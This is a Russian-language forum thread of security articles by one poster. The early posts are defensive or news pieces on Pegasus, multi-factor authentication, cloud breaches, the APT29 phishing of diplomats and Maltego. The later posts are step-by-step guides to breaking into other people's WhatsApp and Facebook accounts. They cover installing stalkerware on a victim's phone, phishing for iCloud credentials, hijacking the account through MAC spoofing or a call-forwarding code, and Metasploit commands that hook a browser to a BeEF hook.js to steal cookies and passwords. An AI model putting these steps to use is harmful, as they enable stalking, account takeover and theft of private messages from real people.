https://i.gyazo.com/81f9caa3d31044165de268da198e6fa1.jpg
Опасности и ущерб
Шпионское ПО Pegasus представляет серьезную угрозу для отдельных лиц, организаций и даже правительств. Его возможности позволяют ставить под угрозу неприкосновенность личной жизни, компрометировать конфиденциальную информацию и нарушать права человека.
Летом 2021 года стало известно, что правительства по всему миру использовали шпионское программное обеспечение Pegasus от NSO Group для незаконной слежки за правозащитниками, политическими лидерами, журналистами и юристами по всему миру.
Pegasus и споры
Использование шпионского ПО Pegasus не обошлось без споров. Обвинения в его неправомерном использовании и потенциальных нарушениях прав человека вызвали широкое осуждение и судебные иски. Критики утверждают, что инструментам наблюдения, таким как Pegasus, не хватает прозрачности и надзора. Скрытный характер шпионских инструментов не дает установить правомерность их использования.
Велись общественные дебаты касаемо тонкой границы между безопасностью и конфиденциальностью. В то время как правительства утверждают, что такое наблюдение необходимо для национальной безопасности и борьбы с терроризмом, защитники прав на неприкосновенность частной жизни считают, что такие ПО оказывают только негативное влияние.
Разоблачения, связанные с Pegasus, вызвали призывы к более строгому регулированию и надзору за шпионскими технологиями. Вводятся новые правовые рамки и международные соглашения, регулирующие использование таких инструментов.
Защита от Pegasus
Обнаружение и устранение шпионского ПО Pegasus вызывает значительные трудности из-за его сложной структуры и способности использовать уязвимости в мобильных устройствах. Однако, организации по кибербезопасности активно работают над выявлением и противодействием этим попыткам навязчивой слежки.
Несмотря на то, что борьба с передовым кибероружием Pegasus является сложной задачей, есть меры, которые вы можете предпринять для повышения своей безопасности:
Регулярно обновляйте программное обеспечение. Разработчики постоянно работают над устранением уязвимостей, которые могут быть использованы шпионскими программами, такими как Pegasus.
Используйте последнюю версию операционной системы, что значительно снизит риск стать жертвой таких атак.
Установите надежный антивирус. Антивирусное программное обеспечение может помочь обнаружить потенциальные угрозы. Регулярное сканирование устройств на наличие любой подозрительной активности имеет решающее значение для своевременного обнаружения.
Соблюдайте осторожность. Будьте бдительны, когда переходите по ссылкам, загружаете вложения или отвечаете на нежелательные сообщения. Проверяйте источник и подлинность любого сообщения, прежде чем предпринимать какие-то действия.
Защитите свою сеть Wi-Fi с помощью надежного пароля. Используйте протоколы шифрования и включите брандмауэр для защиты от взлома.
Ограничьте разрешения приложений. Просмотрите разрешения, предоставленные приложениям на вашем устройстве. Ограничьте доступ к конфиденциальным данным, таким как местоположение или микрофон, приложениям, которым они не нужны.
Регулярно создавайте резервные копии данных. Храните резервные копии на отдельных устройствах или в безопасном облачном хранилище.
Будьте в курсе последних угроз и защитных мер в области кибербезопасности.
Заключение
Появление шпионского ПО Pegasus демонстрирует сложную природу киберугроз в современном цифровом ландшафте. Его возможности проникать в устройства и нарушать конфиденциальность являются ярким напоминанием о важности соблюдения надежных мер кибербезопасности. Сохраняя бдительность, применяя защитные меры и оставаясь в курсе новостей, пользователи могут противостоять такому грозному кибероружию, как Pegasus. Давайте стремиться защитить наш цифровой мир и обеспечить безопасность перед лицом постоянно меняющихся угроз.
BlackMAST
15.07.2023, 15:34
https://i.gyazo.com/ac0169e38b3b8c218ae688163b10dac6.jpg
Вступить в наш чат
В современном киберпространстве конфиденциальность личных данных является первостепенной задачей для многих пользователей. Чтобы защититься от постоянно меняющихся киберугроз, одних паролей уже недостаточно. Тут на помощь приходит многофакторная аутентификация (MFA), она сочетает в себе несколько уровней защиты, значительно повышая безопасность.
Сегодня мы расскажем о видах MFA, ее важности и потенциале.
https://i.gyazo.com/ede52755d24b819cc4e37c592fc56625.jpg
С ростом киберпреступности использование пароля, как основного способа защиты, уже не является панацей. Брутфорс, фишинговые атаки и утечки данных еще раз доказывают, что для защиты учетных записей необходим более надежный подход. В качестве решения этих проблем появилась многофакторная аутентификация.
Эволюция MFA
Токен аутентификация
Одним из ранних видов MFA является система аутентификации на основе токенов, которая генерирует одноразовые пароли (OTP), синхронизированные с сервером. Эти одноразовые пароли постоянно меняются, оставаясь действительными только в течение короткого периода времени, что обеспечивает дополнительный уровень безопасности.
Двухфакторная аутентификация (2FA)
Двухфакторная аутентификация ввела дополнительный уровень безопасности. В добавок к паролю пользователи должны указать второй фактор для подтверждения своей личности.
Этот второй фактор обычно попадает в одну из трех категорий:
Что-то, что знает пользователь: это может быть PIN-код, секретный вопрос или уникальный личный идентификатор.
Что-то, чем владеет пользователь: сюда входят физические токены, смарт-карты или брелоки, которые генерируют одноразовые пароли (OTP).
Что-то, чем является пользователь: это включает биометрические факторы, такие как отпечатки пальцев, сканирование радужной оболочки или распознавание лиц.
2FA обеспечивает более высокий уровень безопасности за счет объединения нескольких факторов аутентификации, что значительно затрудняет получение доступа злоумышленникам.
Трехфакторная аутентификация (3FA)
Трехфакторная аутентификация добавляет еще один уровень безопасности помимо пароля и второго фактора.
Этот третий фактор может включать в себя комбинацию следующего:
Что-то, что знает пользователь: это может быть пароль или PIN-код.
Что-то, чем владеет пользователь: это могут быть физические жетоны, смарт-карты или брелоки.
Что-то, чем является пользователь: это включает в себя биометрические факторы, такие как отпечатки пальцев, сканирование радужной оболочки или распознавание лица.
Что-то, что делает пользователь: это включает в себя поведенческие или контекстуальные факторы, такие как шаблоны ввода, местоположение устройства или активность пользователя.
Появление MFA, включая 2FA и 3FA, обусловлено необходимостью устранить ограничения однофакторной аутентификации и усилить общую безопасность. Одни только пароли не являются безопасными: они подверженны различным атакам. MFA стремится снизить эти риски, требуя от пользователей предоставления дополнительных форм проверки, что значительно снижает вероятность взлома.
SMS-аутентификация
Когда мобильные устройства стали повсеместными, MFA начали использовать аутентификацию на основе SMS. Этот подход заключается в отправке одноразового кода на зарегистрированный номер мобильного телефона пользователя, который затем нужно ввести для подтверждения личности. Несмотря на удобство, MFA на основе SMS имеет уязвимости, такие как клонирование и перехват SIM-карты. Это привело к поиску более безопасных альтернатив.
Биометрическая аутентификация
Интеграция биометрической аутентификации произвела революцию в среде MFA. Биометрические данные, такие как отпечатки пальцев, сканирование радужной оболочки глаза и распознавание лиц, обеспечивают надежную защиту. Биометрическая аутентификация не только повышает безопасность, но и имеет более удобный пользовательский интерфейс. Смартфоны и другие устройства теперь оснащены биометрическими датчиками, которые позволяют пользователям быстро разблокировать свои устройства одним только взглядом или касанием.
Контекстная и поведенческая аутентификация
Этот способ аутентификация использует машинное обучение и проверку поведения пользователей для анализа попыток доступа. Сюда входят такие факторы, как информация об устройстве, местоположение, время доступа и т.д. Оценивая эти контекстуальные подсказки, системы могут принимать разумные решения о подлинности попытки входа в систему, обеспечивая беспрепятственный доступ для доверенных пользователей и подавая сигналы тревоги в случае подозрительной активности.
Плюсы многофакторной аутентификации:
Повышенная безопасность. Основным преимуществом MFA является способность значительно повысить конфиденциальность, требуя от пользователей предоставления нескольких форм проверки личности. Даже если злоумышленники завладели одним из факторов проверки, дополнительные уровни аутентификации послужат дополнительной защитой.
Защита от брутфорс-атак. MFA снижает риск атаки с использованием паролей. Даже если пароль пользователя ненадежен или скомпрометирован, дополнительные факторы аутентификации снижают вероятность взлома.
Скорость. Хотя MFA добавляет дополнительный уровень проверки, это не делает процесс аутентификации более долгим. Такие факторы, как биометрическая аутентификация (отпечаток пальца, распознавание лица) обеспечивают беспрепятственный и быстрый процесс проверки.
Минусы многофакторной аутентификации:
Сложность и проблемы в использовании. Одним из потенциальных недостатков MFA является его сложность, которая может создавать проблемы для некоторых пользователей. Управление несколькими факторами аутентификации и их запоминание могут быть трудоемкими, особенно если пользователям необходимо часто проходить аутентификацию на разных платформах.
Зависимость от внешних факторов. Некоторые формы MFA, например, аутентификация на основе SMS, зависят от внешних факторов. Эта зависимость создает уязвимости, поскольку эти внешние системы могут быть подвержены сбоям, задержкам или нарушениям безопасности. Крайне важно выбрать методы MFA, которые сводят к минимуму зависимость от потенциально небезопасных или ненадежных внешних факторов.
Ошибки. В некоторых случаях системы MFA могут выдавать ошибки из-за технических сбоев или человеческого фактора, что вызывает неудобства.
Заключение
Беспарольные методы аутентификации, такие как биометрические данные, SMS, аппаратные токены, все больше набирают популярность. Комбинируя несколько уровней проверки, MFA обеспечивает более безопасную цифровую среду для пользователей во всем мире и помогает защитить конфиденциальную информацию от злоумышленников.
BlackMAST
15.07.2023, 15:39
https://i.gyazo.com/3266e9b620bc8fe3760e47db9a9fa6fb.jpg
Вступить в наш чат
В последние годы резко возросло количество облачных сервисов: возможность получать доступ к своим файлам из любого места сделали их популярными среди многих пользователей. Однако, за этой популярностью последовало значительное увеличение числа кибератак, направленных на эти сервисы.
В этой статье мы расскажем с какими угрозами сталкиваются владельцы облачных хранилищ, а также какие меры безопасности необходимо соблюдать, чтобы это удобное изобретение не обернулось утечкой ваших данных.
https://i.gyazo.com/f9bfc5e3dc0b482313dac0354b136c19.jpg
Как взламывают облачные сервисы
Чтобы полностью осознать масштаб проблемы, важно понять как устроены облачные сервисы.
Облако позволяет пользователям хранить, управлять и получать доступ к своим данным удаленно через серверы, подключенные к Интернету.
Спо*собов взло*ма мно*го: фишинг, сти*леры, перебор пароля и даже высоко*тех*нологич*ные ата*ки на про*вай*деров и опе*рато*ров сотовой свя*зи.
Распределенные атаки типа «отказ в обслуживании» (DDoS) подавляют работу облачных хранилищ, что нарушает работу сервисов.
Внедрение вредоносного ПО.Злоумышленники используют уязвимости в облачных системах для внедрения вредоносного кода или вредоносного ПО, которые позволяют им получить контроль, украсть данные или нарушить работу служб.
Внутренние угрозы. В облачных службах часто участвует множество сторон, включая облачных провайдеров, клиентов и сторонних поставщиков. Облачные провайдеры хранят огромные объемы конфиденциальных данных, что делает их главной целью для злоумышленников. Кроме того, внутренние угрозы возникают, когда доверенное лицо с авторизованным доступом злоупотребляет своими привилегиями, что приводит к краже данных.
Масштабные атаки на облачные сервисы
Утечка данных Target (2013 г.). В результате одной из самых масштабных утечек данных гигант розничной торговли Target потерпел крах: были украдены данные около 110 миллионов клиентов. Злоумышленники получили доступ к сети Target через учетные данные стороннего поставщика, используя уязвимости в облачной системе.
DDoS-атака Dyn (2016 г.). Атака Dyn, массовая распределенная атака типа «отказ в обслуживании» (DDoS), затронула множество крупных веб-сайтов и сервисов, включая Twitter, Netflix и ******. Атака была нацелена на облачную инфраструктуру системы доменных имен (DNS) Dyn, что привело к массовым сбоям в обслуживании и выявило уязвимость критически важных облачных служб.
Утечка данных Capital One (2019 г.). В ходе одной из крупнейших утечек данных в истории банковского дела в Capital One была раскрыта личная информация более 100 миллионов клиентов. Кроме того, злоумышленник воспользовался неправильно настроенным брандмауэром приложений (WAF) в облачной среде Capital One, тем самым получив несанкционированный доступ к данным клиентов, хранящимся на серверах Amazon Web Services (AWS).
Кампания Cloud Hopper (2018 г.). Cloud Hopper проникли в сети MSP и получили контроль над облачными хранилищами нескольких организаций, что позволило им украсть данные и вести шпионскую деятельность.
Удаление данных Code Spaces (2014 г.). Платформа Code Spaces столкнулась с разрушительной атакой, которая стала причиной полного прекращения работы. Злоумышленники получили доступ к облачной инфраструктуре компании и начали удалять данные и резервные копии клиентов.
Как защитить свое облако
Чтобы противостоять атакам, важно предпринимать надежные меры безопасности в своих облачных сервисах. Вот несколько советов, которые могут помочь:
Многофакторная аутентификация. Используете многофакторную проверку личности (MFA) для повышения безопасности. MFA значительно снижает риск взлома и повышает общий уровень безопасности.
Подробнее о многофакторной аутентификации читайте в нашей статье.
Шифрование. Шифрование данных как при хранении, так и при передаче играет решающее значение для обеспечения конфиденциальности. Эта практика преобразует данные в нечитаемый формат, делая их бесполезными для третьих лиц, даже если им удастся их перехватить. Используя надежные алгоритмы шифрования, пользователи могут защитить свои данные от возможных атак.
Что такое стеганография, и как зашифровать файлы читайте тут.
Регулярные аудиты безопасности. Проведение систематических проверок безопасности помогает выявлять уязвимости на ранних этапах. Оперативно устраняя их, пользователи могут быть уверены, что их данные не будут скомпрометированы.
Оставаться в курсе последних новостей. Каждый пользователь, который беспокоится о своей безопасности, должен регулярно следить за передовыми методами обеспечения безопасности, чтобы значительно минимизировать шансы на возможные атаки.
Читайте также: Как создать свое безопасное облачное хранилище.
Заключение
Поскольку пользователи все больше полагаются на облачные сервисы, хакерские угрозы продолжают расти. Каждый человек должен осознавать потенциальные риски и принимать активные меры для защиты своих данных. Следуя нашим советами, вы можете эффективно защитить свои данные и избежать взлома. Только совместными усилиями мы можем обеспечить постоянный рост облачных технологий, одновременно, поддерживая безопасность и целостность наших данных.
BlackMAST
18.07.2023, 19:30
https://i.gyazo.com/08dd2af22d49f917bd1a7bfac338b15d.jpg
Вступить в наш чат
Хакеры, подозреваемые в работе на российскую службу внешней разведки, атаковали десятки дипломатов в посольствах в Украине с помощью поддельной рекламы подержанных автомобилей, пытаясь взломать их компьютеры. Широкомасштабная шпионская деятельность была направлена против дипломатов, работающих как минимум в 22 из примерно 80 иностранных представительств в столице Украины Киеве, говорится в отчете аналитиков исследовательского подразделения Palo Alto Networks Unit 42. В этой статье узнаем подробности взлома.
Что произошло
Польский дипломат, который отказался назвать свое имя, сославшись на соображения безопасности, подтвердил роль рекламы в цифровом вторжении. Хакеры, известные как APT29 или «Cozy Bear», перехватили и скопировали эту рекламу (BMW), внедрили в нее вредоносное ПО, а затем отправили ее десяткам других иностранных дипломатов, работающих в Киеве.
«Это ошеломляет по своим масштабам, ведь обычно такие взломы представляют собой узкомасштабные и тайные операции», — говорится в отчете.
https://i.gyazo.com/4572263a2778beaa2fe93c46e7b7a76f.png
Как произошел взлом
«Взлом начался с безобидного и законного события», — говорится в отчете, о котором впервые сообщило агентство Reuters.
«В середине апреля 2023 года дипломат Министерства иностранных дел Польши отправил по электронной почте в различные посольства настоящие листовки, рекламирующие продажу подержанного седана BMW 5-й серии, находящегося в Киеве».
Хакеры, известные как APT29 или «Cozy Bear», перехватили и скопировали эту рекламу (BMW), внедрили в нее вредоносное ПО, а затем отправили ее десяткам других иностранных дипломатов, работающих в Киеве.
Кто стоит за взломом
В 2021 году спецслужбы США и Великобритании идентифицировали APT29 как подразделение Службы внешней разведки России, СВР. СВР не ответила на запрос Reuters о комментариях по поводу хакерской кампании.
В апреле польские органы контрразведки и кибербезопасности предупредили, что эта же группа провела «широкомасштабную разведывательную кампанию» против стран-членов НАТО, Европейского Союза и Африки.
Исследователи из Unit 42 смогли связать фальшивую рекламу автомобиля с СВР, потому что хакеры повторно использовали определенные инструменты и методы, которые ранее были связаны с этой хакерской группировкой.
https://i.gyazo.com/d89905796b29ffece126cdfbb6962a6c.png
Б/У BMW стал инструментом взлома
Польский дипломат сказал, что отправил объявление в различные посольства в Киеве, и что кто-то перезвонил ему, потому что цена выглядела «привлекательной».
«Когда я с ними связался, я понял, что они говорили о более низкой цене, чем я указал в объявлении, и это меня насторожило», — сказал дипломат.
Как выяснилось, хакеры указали на BMW дипломата более низкую цену — 7500 евро — в своей поддельной версии рекламы, пытаясь побудить больше людей загружать вредоносное программное обеспечение, которое дало бы им удаленный доступ к их устройствам.
Это программное обеспечение, по словам Unit 42, было замаскировано под альбом фотографий подержанного BMW. В отчете говорится, что попытки открыть эти фотографии заразили бы машину жертвы.
https://i.gyazo.com/406de924b847c7df52ecf966b7a790a7.png
Масштаб утечки
21 из 22 посольств, подвергшихся нападению хакеров, не предоставили комментариев. Неясно, какие посольства, если таковые имеются, были скомпрометированы.
Представитель Госдепартамента США заявил, что они «знали об этой деятельности и на основании анализа Управления кибербезопасности и технологической безопасности пришли к выводу, что она не затронула системы или учетные записи департамента».
Что касается автомобиля, то он по-прежнему доступен, сообщил польский дипломат:
«Возможно, я попытаюсь продать его в Польше», — сказал он. «После этой ситуации я больше не хочу иметь проблем».
https://i.gyazo.com/6dde5b922ee3821c152f48388efb89be.png
BlackMAST
25.07.2023, 10:58
https://i.gyazo.com/ce386400b7d4cf2a3373c7ac31f13df7.jpg
Вступить в наш чат
При поиске исчерпывающей информации из открытых источников, невольно задаешься вопросом, а есть ли ресурсы и механизмы, чтобы все это систематизировать? Сбор и анализ данных может быть сложной и трудоемкой задачей. Однако, уже давно появились специальные OSINT инструменты для упрощения этого процесса. Одним из таких инструментов является Maltego, который позволяет пользователям находить и систематизировать большие объемы информации. В этой статье мы расскажем о Maltego и изучим его функции.
https://i.gyazo.com/9631c2da17c5700f149aae501fc958e1.jpg
Сбор и анализ данных
Maltego — это мощное программное обеспечение по сбору информации (OSINT) c открытым исходным кодом. Истинная сила Maltego заключается в его способности собирать и анализировать данные из различных источников (в профилях социальных сетей, по адресам электронной почты, по номерам телефонов и не только). Инструмент поставляется с набором бесплатных функций, которые собирают и анализируют информацию.
Transform Hub — это торговая площадка в Maltego, где вы можете найти дополнительные функции, которые обеспечивают доступ к широкому спектру данных. Более того, многие из них являются бесплатными. Так, вы можете собирать данные из нескольких источников и получить полное представление о вашей цели.
https://i.gyazo.com/5976f5c18147ef319fd4c210991bdb6f.jpg
Возможность объединять данные с различных платформ и баз данных — ключевая особенность Maltego, позволяющая обнаруживать скрытые связи и закономерности. Все, что находит инструмент, он собирает в схему, а после этого строит логические связи между данными. Для этого в самой программе существует 3 элемента: Entities, Transforms и Links.
Entities - объект. Что-то или кто-то. Информация, которой придали некое логическое значение. Например, конкретный человек, компания, компьютер, веб-сайт.
Transforms- это метод или процесс. Это то, как Maltego достает и интерпретирует найденную информацию. Например, загружает данные из социальной сети со страницы человека на получившийся граф.
Links - это связи. Строятся между Entities и отражают логическую связь элементов между собой.
https://i.gyazo.com/df4e867a103657b073adbcf6da0e13dc.jpg
Когда вы собираете данные и устанавливаете соединения, Maltego обновляет график. Визуальное отображение информации играет решающую роль в выявлении закономерностей, обнаружении скрытых связей и выявлении потенциальных уязвимостей. Maltego позволяет настраивать внешний вид элементов графика, создавая четкие и информативные связи, которые помогают в процессе анализа.
https://i.gyazo.com/3b3ee74c7104ebc2be2a57085f455acb.jpg
Maltego также имеет функции, которые упрощают командную работу и обмен информацией. Кроме того, возможность экспорта графиков в различные форматы, такие как PDF, PNG и SVG, позволяет вам делиться своими выводами с заинтересованными сторонами. Также, Maltego интегрирует данные с внешними инструментами и платформами, тем самым облегчая объединение нескольких источников информации для более всестороннего анализа. Используя эти функции вы можете повысить эффективность OSINT разведки.
Заключение
Maltego — универсальный помощник каждого OSINT-разведчика, который собирает большие объемы данных из открытых источников. Инструмент предлагает широкий спектр функций, которые позволяют выявлять скрытые взаимосвязи и упрощают анализ. Благодаря функциям совместной работы и возможностям интеграции, Maltego становится ценным ресурсом для эффективной командной работы и обмена информацией.
BlackMAST
27.07.2023, 23:00
Как взломать WhatsApp: 5 рабочих способов
https://i.gyazo.com/1f8180fbc1b873bd5bec853ca924f0f7.png
Вступить в наш чат
WhatsApp — один из самых популярных мессенджеров, которым пользуется треть населения планеты. Разработчики этого приложения усердно работают, чтобы обеспечить максимальную безопасность для пользователей. Но тем не менее, какими бы хорошими ни были эти меры безопасности, WhatsApp по-прежнему не застрахован от взломов, которые могут в конечном итоге поставить под угрозу конфиденциальность ваших сообщений и контактов. Многие пользователи упорно пытаются найти в интернете способ, как взломать WhatsApp, но получают лишь фишинговые сайты или инструменты, которые уже слишком устарели.
Поэтому мы проанализировали и выбрали 5 лучших способов взлома WhatsApp, которые работают даже после всех обновлений безопасности.
https://i.gyazo.com/0e7ad352a7e0d3dd25eea19cae6de15a.jpg
1. Как взломать WhatsApp с помощью шпионского приложения
Шпионское программное обеспечение — это приложение для Android и iOS (также доступно на ПК), которое вам необходимо установить на устройство жертвы. Как только жертва подключится к интернету, вы получите доступ ко всем ее учетным данным, личной информации и всему остальному.
Некоторые из них имеют платную подписку, но вы также можете найти в нашей подборке и бесплатные инструменты.
CocoSpy
https://i.gyazo.com/7aa090d1974e0078bf3cd5361cf2eb7f.jpg
CocoSpy можно использовать для взлома учетной записи WhatsApp и других приложений. Просто следуйте инструкциям ниже:
Шаг 1. Зарегистрируйте учетную запись Cocospy на сайте.
Шаг 2. Для Android: используйте социальную инженерию, чтобы получить доступ к телефону жертвы и установить на него приложение Cocospy. Далее введите свой код входа для настройки приложения.
Шаг 3. Для iPhone: введите учетные данные iCloud целевого пользователя на панели инструментов Cocospy.
Шаг 4. Перейдите на панель инструментов Cocospy, и вы увидите информацию о взломанном телефоне. В колонке слева выберите WhatsApp. Таким образом, вы сможете отслеживать все сообщения WhatsApp.
Spyzie
https://i.gyazo.com/8756ee36f6540afd1cee752712e7f548.jpg
Шаг 1. Перейдите на сайт www.spyzie.com и заведите аккаунт.
Шаг 2. Введите данные телефона жертвы и свяжите свою учетную запись с её телефоном.
Шаг 3. Для iPhone: введите учетные данные iCloud целевого пользователя, и его учетная запись будет взломана.
Шаг 4. Для Android: загрузите приложение Spyzie Android на целевое устройство. И войдите в свою учетную запись из этого приложения.
Шаг 5. В левой части выберите опцию «WhatsApp», которая находится в разделе «Соцсети». Готово, теперь вся переписка жертвы у вас на виду.
MSPY
https://i.gyazo.com/671d89560b4542536beb48222df8885a.jpg
Шаг 1: Зайдите на сайт mSpy. Выберите подписку и оплатите.
Шаг 2: Создайте аккаунт. Вы получите электронное письмо с подтверждением и ссылкой, ведущей к вашей панели управления.
Шаг 3: Выберите целевое устройство. Если вы хотите взломать удаленно, вам нужно нажать на опцию «без джейлбрейка» и выполнить следующий шаг.
Шаг 4: Введите учетные данные iCloud и войдите в систему. Теперь вам нужно будет ввести Apple ID и пароль жертвы, чтобы войти в систему. К сожалению, их вы должны получить самостоятельно, используя фишинг или социальную инженерию.
Шаг 5: Готово. Вы успешно взломали учетную запись WhatsApp.
Шаг 6: В панели управления прокрутите вниз до опции «WhatsApp» и следите за учетной записью жертвы.
Более подробно мы рассказывали, как работает инструмент mSpyв этой статье.
Hoverwatch
https://i.gyazo.com/9499d8eae6f2786d63780504bc71e858.jpg
Шаг 1. Зарегистрируйте бесплатную учетную запись Hoverwatch, указав свой адрес электронной почты и пароль.
Шаг 2. Загрузите трекер WhatsApp на целевой телефон.
Шаг 3. Войдите в систему через панель инструментов. Теперь вы можете отслеживать все сообщения WhatsApp в учетной записи hoverwatch.
2. Mac-спуфинг для взлома WhatsApp
Спуфинг MAC-адреса — метод изменения MAC-адреса сетевого устройства, позволяющий обойти список контроля доступа к серверам, маршрутизаторам. С помощью этого процесса вы можете быстро научиться взламывать учетные записи WhatsApp.
В отличие от предыдущего метода, этот способ требует от вас базового хакерского опыта. Итак, поехали.
MAC-адрес относится к адресу «Media Access Control», который представляет собой 12-символьный идентификатор вашего сетевого адаптера или сетевой карты. Он уникален для каждого устройства. Чтобы взломать учетную запись WhatsApp вашей жертвы, вам нужен ее MAC-адрес.
Шаг 1. Удалите WhatsApp. В первую очередь вам необходимо удалить свою учетную запись WhatsApp со своего телефона. И удалите все папки, связанные с WhatsApp.
Шаг 2: Получите доступ к устройству жертвы.
Шаг 3: Найдите MAC-адрес жертвы:
Android: Настройки > О телефоне > Статус > MAC-адрес Wi-Fi.
iPhone: «Настройки» > «Основные» > «О программе» > «Адрес Wi-Fi».
Windows: «Настройки» > «Об этом устройстве» > «Адрес Wi-Fi» и «Bluetooth».
Шаг 4: Найдите свой собственный MAC-адрес. Сделайте скриншот и сохраните его.
Шаг 5: Введите MAC-адрес вашей цели в свой телефон. Вам нужно изменить свой mac-адрес на адрес жертвы. Это способ известен как спуфинг.
Шаг 6. Загрузите и установите приложения для подмены MAC-адресов. Для iPhone вы можете использовать приложение MacDaddy X или WifiSpoof. Для Android вы можете использовать BusyBox, эмулятор терминала или приложение для смены Mac.
Теперь в терминале вам нужно будет ввести «ip link show».
Найдите интерфейс с вашим MAC-адресом, чтобы изменить его. В зависимости от того, какое приложение вы используете, шаги могут немного отличаться.
Шаг 7: Загрузите и установите WhatsApp на свой телефон, но на этот раз войдите в систему с номером мобильного телефона жертвы.
Шаг 8: Для подтверждения необходимо ввести проверочный код. Таким образом, вы получите полный доступ к WhatsApp цели.
Шаг 9. Сбросьте свой MAC-адрес. Теперь, когда у вас есть доступ к телефону жертвы, вам нужно вернуться и изменить свой MAC-адрес, следуя советам, описанным под номером 3.
Ваш доступ к телефону жертвы сохранится до тех пор, пока вы не выйдете из системы.
3. Извлечение базы данных WhatsApp
Whatsapp хранит все сообщения в базе данных, которая находится в вашем телефоне. Но эта база данных WhatsApp защищена ключом. Сейчас мы продемонстрируем, как его получить.
Чтобы получить ключ, вы должны рутировать свой телефон. Используя ключ, вы можете разблокировать базу данных, после чего просканировать все сообщения.
Расположение базы данных WhatsApp:
/sdcard/Whatsapp/database
Расположение ключа в корневом каталоге:
/data/data/com.whatsapp/files/key
Для доступа к ключам нужен root. С помощью ключа вы можете легко расшифровать данные. Используйте этот инструмент для декодирования данных WhatsApp Viewer.
4. Взлом WhatsApp картинкой
Это довольно технический и сложный взлом, который требует большого опыта и знаний в области кодирования. Однако, это один из самых действенных и широко используемых взломов.
Атака происходит следующим образом:
Шаг 1. WhatsApp сохраняет разрешенные типы документов в клиентской переменной W["default"].DOC_MIMES. В этой переменной хранятся разрешенные типы Mime, используемые приложением. Поскольку на серверы WhatsApp отправляется зашифрованная версия документа, можно добавить в переменную новый тип Mime, например «text/html», чтобы обойти ограничение клиента и вместо этого загрузить вредоносный HTML-документ.
Шаг 2: Создайте вредоносный HTML-файл с изображением. Зашифруйте данные с помощью encryptE2Media.
Шаг 3: Как только жертва нажмет на ссылку на web.whatsapp.com, она увидит двоичный код, и сессия будет перехвачена.
Таким образом, вы узнали, как взломать WhatsApp, просто используя изображение, отправленное через веб-сайт WhatsApp.
5. Метод переадресации вызовов
Если вы не хотите использовать свой компьютер или у вас нет доступа к приложению WhatsApp вашей жертвы для сканирования QR-кода, используйте этот метод.
Шаг 1. Для этого способа вам необходимо установить WhatsApp на свой телефон или очистить данные существующего.
При создании учетной записи WhatsApp пользователь проходит аутентификацию с помощью SMS или звонка. Используя переадресацию звонков, вы можете получить доступ к целевому телефону, перенаправляя его звонки на свой телефон. Вот как вы можете это сделать:
Шаг 2. Для переадресации телефонных звонков жертвы на ваш номер наберите *21*ваш номер#.
Шаг 3. Теперь откройте WhatsApp на своем телефоне и введите номер жертвы. После ввода проверочного кода вы получите доступ ко всем перепискам.
Заключение
Сегодня вы научились искусству взлома учетной записи WhatsApp. Взломать WhatsApp можно, но существует и риск быть пойманным, поскольку для большинства методов требуется прямой доступ к устройству жертвы. Однако, человеческая беспечность и социальная инженерия порой делают невозможное. Удачи!
BlackMAST
03.08.2023, 01:13
Взлом Facebook с помощью Metasploit и Beef
https://i.gyazo.com/81db9348b731c2d781956e9c3757ac31.jpg
Вступить в наш чат
В интернете есть множество советов о том, как взломать Facebook, многие из которых являются платными, не говоря уже о том, что они не работают. Не становитесь жертвами этих мошенников, поскольку не существует волшебного метода взлома Facebook. Есть только несколько способов эксплуатации уязвимостей Facebook с помощью нашего старого доброго друга социальной инженерии.
Если вы хотите хакнуть чей-то аккаунт в Facebook, то вам повезло – вы в правильном месте. Сегодня мы покажем, как можно использовать фреймворки Metasploit и Beef для взлома учетной записи Facebook.
https://i.gyazo.com/bc1b4858aca488114fd2f27de8544e03.jpg
Как взломать Facebook
Шаг 1: Запустите Kali Linux и откройте Metasploit.
По умолчанию Metaspoilt доступен на левой боковой панели. Тот, что с большой буквой «М», — это Metasploit. Но вы также можете использовать терминал для запуска Metasploit с помощью следующей команды:
kali > msfconsole
https://i.gyazo.com/dcb3f817ba018024d9f02b8dfd64c9a0.jpgШаг 2: Найдите эксплойт.
https://i.gyazo.com/25cb1f62b62dc2937a9e09bad79db5db.jpgДавайте загрузим эксплойт, введя следующую команду:
msf5 > use auxiliary/gather/android_stock_browser_uxss
Шаг 3: Получите информацию об эксплойте.
Теперь, когда мы загрузили модуль эксплойта, мы можем получить подробную информацию о нем с помощью следующей команды:
msf5 > info
Шаг 4: Настройте параметры.
Нам нужно установить параметр «REMOTE_JS», чтобы подключить жертву с помощью Beef.
Шаг 5: Откройте фреймворк Beef.
Теперь откройте Beef. Используя этот инструмент, мы можем легко взломать браузер жертвы и получить все пароли и файлы cookie.
https://i.gyazo.com/cad7b06eeae1e98112a3dee4ee771283.jpgКак только вы введете пароль, сервер Beef запустится, и вы увидите следующую страницу:
Учетные данные по умолчанию — «beef» для имени пользователя и нового пароля, который вы только что установили.
Шаг 6: Настройка JS на хук Beef.
Вернемся к консоли Metasploit. Чтобы взломать аккаунт жертвы в Facebook, нам нужно получить доступ к её данным браузера. Для этого установим REMOTE_JS в хук на Beef.
Для использования этого хака убедитесь, что вы используете правильный IP:
Синтаксис: set REMOTE_JS Loading...
Итак, в нашем случае команда Metasploit становится:
msf5> set REMOTE_JS http://192.168.128.182:3000/hook.js
Теперь нам нужно установить URIPATH в корневой каталог:
msf5> set uripath /
Шаг 7: Запуск веб-сервера Metasploit.
Запустите веб-сервер Metasploit, на котором будет размещен хук Beef:
msf > run
Шаг 8:Подождите, пока жертва зайдет на сайт из своего браузера.
Используйте социальную инженерию, чтобы заставить жертву нажать на ссылку.
Шаг 9: Подключаем браузер к Beef через Metasploit.
Когда жертва зайдет на наш вредоносный веб-сервер по адресу 192.168.128.182, JavaScript Beef подключится к её браузеру. Он появится в разделе «Hooked Browser» в Beef, после чего вы сможете управлять всеми данными.
Шаг 10: Теперь проверьте, аутентифицирован ли подключенный браузер с помощью Facebook.
Как только браузер подключится к Beef, отметьте опцию обнаружения социальных сетей. Используя эту опцию, вы сможете перехватить все данные в Facebook.
Поздравляем, вы успешно научились взламывать аккаунты Facebook с помощью Metasploit и Beef.
Заключение
Facebook по праву считается социальной сетью N° 1 в мире, на защиту которой пущены все средства. Именно поэтому, не стоит питать иллюзии, думая, что можно взломать Facebook за считанные секунды. Способ, описанный выше, не так прост в реализации, и требует определенных навыков и умений. Однако, если вы примете во внимание все изложенное в этой статье, наберетесь терпения, то тогда результат не заставит себя долго ждать.
BlackMAST
14.08.2023, 20:40
https://i.gyazo.com/0188c14202edcaae837629ac3959a1ba.jpg
Вступить в наш чат
